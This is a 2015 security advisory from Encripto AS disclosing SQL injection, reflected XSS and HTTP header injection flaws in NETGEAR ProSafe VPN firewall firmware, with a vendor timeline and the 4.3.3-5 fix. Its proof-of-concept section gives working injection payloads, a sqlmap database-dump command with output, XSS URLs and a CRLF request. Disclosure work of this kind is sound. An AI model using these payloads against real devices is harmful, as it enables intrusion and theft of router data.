About Encripto AS ================= Encripto is a Norwegian company which provides specialized services within IT-security. Our core expertise is security testing, network security monitoring and training. Encripto is committed to information security. We do research to discover trends, new vulnerabilities and better ways to mitigate them. We believe in acting as good internet citizens to the industry, whether you are a provider or a user. You can read more about us at http://www.encripto.no Timeline and revision history ============================= - 25th of June 2015 The vendor releases firmware version 4.3.3-5, which fixes the vulnerabilities. Public disclosure of the security advisory. - 3rd of April 2015 The vendor confirms the presence of the vulnerabilities and provides a provisional list with vulnerable products and firmware versions. - 31st of March 2015 New attempt to contact the vendor is made. The vendor acknowledges the case and proceeds to verify the findings. - 20th of March 2015 New vulnerabilities were discovered. Advisory update. - 19th of March 2015 Vulnerabilities discovered by the researcher and details shared with the vendor. Disclaimer ========== The material presented in this document is for educational purposes only. Encripto AS cannot be responsible for any loss or damage carried out by any technique presented in this material. The reader is the only one responsible for applying this knowledge, which is at his / her own risk. Any of the trademarks, service marks, collective marks, design rights, personality rights or similar rights that are mentioned, used or cited in this document is property of their respective owners. License ======= This document is licensed under the terms of the Creative Commons Attribution ShareAlike 3.0 license. More information about this license can be found at http://creativecommons.org/licenses/by-sa/3.0/   Background ========== According to the vendor, NETGEAR® ProSafe® business-class VPN Firewalls are high performing routers that provide full secure network access between headquarter locations, remote/branch offices and remote workers. Summary ======= Multiple NETGEAR® ProSafe® routers, running firmware version 4.3.2-7 and 4.3.3-3, are affected by SQL and HTTP header injection, and multiple Reflected Cross-Site Scripting vulnerabilities. Affected Products ================= The following table gathers the list of vulnerable products with their respective firmware versions. NETGEAR® ProSafe® SRX5308 v4.3.2-7 and v4.3.3-3 NETGEAR® ProSafe® FVS336Gv3 v4.3.2-7 and v4.3.3-3 NETGEAR® ProSafe® FVS336Gv2 v4.3.2-7 and v4.3.3-3 NETGEAR® ProSafe® FVS318N v4.3.2-7 and v4.3.3-3 Previous versions of the firmware could also be affected, but this has not been verified. Vulnerabilities and Proof of Concept (PoC) ========================================== The following PoCs will assume that the vulnerable device is using a standard configuration, and it can be found at https://192.168.1.1 - SQL injection vulnerability --------------------------- The parameter ?portal? of the SSL VPN web application is affected by SQL injection. This could allow an attacker to interact with the Sqlite database supporting the device. Sending the following payloads as portal values resulted in different responses: SSL-VPN47034719'%20or%20'5358'%3d'5358 SSL-VPN47034719'%20or%20'5358'%3d'5359 The vulnerability could be exploited with automated tools, such as SQLmap. The following GET request may be used as a base. GET /scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Command example: python sqlmap.py -r sqli.txt -p portal --threads 5 --dump --force-ssl --dbms=sqlite [?OUTPUT SUPPRESSED?] [13:51:01] [INFO] GET parameter 'portal' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="NETGEAR ProSafe™ - SSL-VPN") [?OUTPUT SUPPRESSED?] GET parameter 'portal' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 39 HTTP(s) requests: --- Parameter: portal (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=portalLogin.htm&portal=SSL-VPN' AND 7037=7037 AND 'iBib'='iBib --- [13:51:12] [INFO] the back-end DBMS is SQLite back-end DBMS: SQLite As an example, the database structure and its contents could be retrieved. Database: SQLite_masterdb [238 tables] +-------------------------------------+ | AlgConf | | AttackChecks | | AttackChecks6 | | AvailableLanHost | | BandWidthProfile | | BandWidthProfileSpeed | | BandWidthProfileStatus | | BlockSites | | BwMonStat | [?OUTPUT SUPPRESSED?] In addition to the ?portal? parameter, the ?USERDBDomains.Domainname? and ?USERDBUsers.UserName? of the ?/scgi-bin/platform.cgi? page presented a similar behavior. - Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities ------------------------------------------------------------- The ?portal?, ?Login.PortalName? and ?stuMsg? parameters of the SSL VPN web application are affected by Reflected XSS. The ?Login.PortalName? is originally a POST parameter that can be provided via GET as well. The following links should document the case. A simple JavaScript payload has been used in these examples: https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN"><script>alert("XSS")</script> https://192.168.1.1/scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=SSL-VPN"><script>alert("XSS")<%2fscript>&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0 https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN&stuMsg=Usereb<script>alert("XSS")<%2fscript> - HTTP header injection vulnerability ----------------------------------- The ?Login.PortalName? of the SSL VPN web application is affected by HTTP header injection. This could be leveraged by an attacker in order to split HTTP responses or inject new headers. The following request demonstrates the issue when submitting the payload in a GET request. The same results could be achieved with a POST request. GET /scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=c9b54%0d%New-header:+8897%0d%0a&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0 HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN Connection: keep-alive HTTP/1.0 302 Moved Temporarily Date: Thu, 31 Jan 2013 06:31:50 GMT Server: Embedded HTTP Server. Connection: close Content-Type: text/html; charset=ISO-8859-1 Location: https://192.168.1.1:443/scgi-bin/platform.cgi?page=portalLogin.htm&portal=c9b54 New-header: 8897 &stuMsg=SSLVPN User authentication Failed. Use the correct SSL portal URL to login. Remediation =========== The vendor has released firmware version 4.3.3-5, which fixes the issues. Encripto encourages product owners to upgrade to this version as soon as possible. Credit ====== The vulnerabilities were discovered by Juan J. Güelfo at Encripto AS. E-mail: post@xxxxxxxxxxx Web: http://www.encripto.no For more information about Encripto?s research policy, please visit http://www.encripto.no/forskning/ References ========== http://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf Special Thanks ============== Special thanks to Maarten Hoogcarspel from the Netgear support team for his quick response and professional case handling.